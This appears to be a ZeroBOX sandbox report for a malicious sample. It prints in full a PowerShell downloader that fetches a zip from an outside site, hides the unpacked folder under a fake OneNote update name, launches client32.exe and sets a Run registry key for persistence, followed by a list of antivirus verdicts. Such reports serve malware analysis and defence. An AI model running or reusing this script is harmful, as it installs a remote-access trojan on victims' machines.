Static | ZeroBOX
No static analysis available.
cd $env:AppData; $link="https://eylulsifalitas.com/baot.zip"; $path=$env:APPDATA+"\tr.zip"; $pzip=$env:APPDATA+"\ONEN0TEupdate"; Start-BitsTransfer -Source $link -Destination $Path; expand-archive -path .\tr.zip -destinationpath $pzip; $FOLD=Get-Item $pzip -Force; $FOLD.attributes='Hidden'; Remove-Item -path $path; cd $pzip; start client32.exe; $fstr=$pzip+"\client32.exe"; New-ItemProperty -Path "HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" -Name "ONEN0TEupdate" -Value $fstr -PropertyType "String";
Antivirus Signature
Lionic Clean
MicroWorld-eScan Clean
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Zillya Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Baidu Clean
VirIT Clean
Cyren Clean
Symantec Clean
ESET-NOD32 PowerShell/TrojanDownloader.Agent.GTE
TrendMicro-HouseCall Clean
Avast Clean
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
Rising Clean
Sophos Clean
F-Secure Clean
DrWeb Clean
VIPRE Clean
TrendMicro Clean
McAfee-GW-Edition Clean
CMC Clean
Emsisoft Clean
Ikarus Trojan-Downloader.PowerShell.Agent
GData Clean
Jiangmin Clean
Avira Clean
Antiy-AVL Clean
Gridinsoft Trojan.U.NetSupport.bot
Xcitium Clean
Arcabit Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
Microsoft TrojanDownloader:PowerShell/Obfuse.AJ!MTB
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee Clean
MAX Clean
VBA32 Clean
Zoner Clean
Tencent Win32.Trojan-Downloader.Downloader.Yolw
Yandex Clean
TACHYON Clean
MaxSecure Clean
Fortinet Clean
BitDefenderTheta Clean
AVG Clean
Panda Clean
No IRMA results available.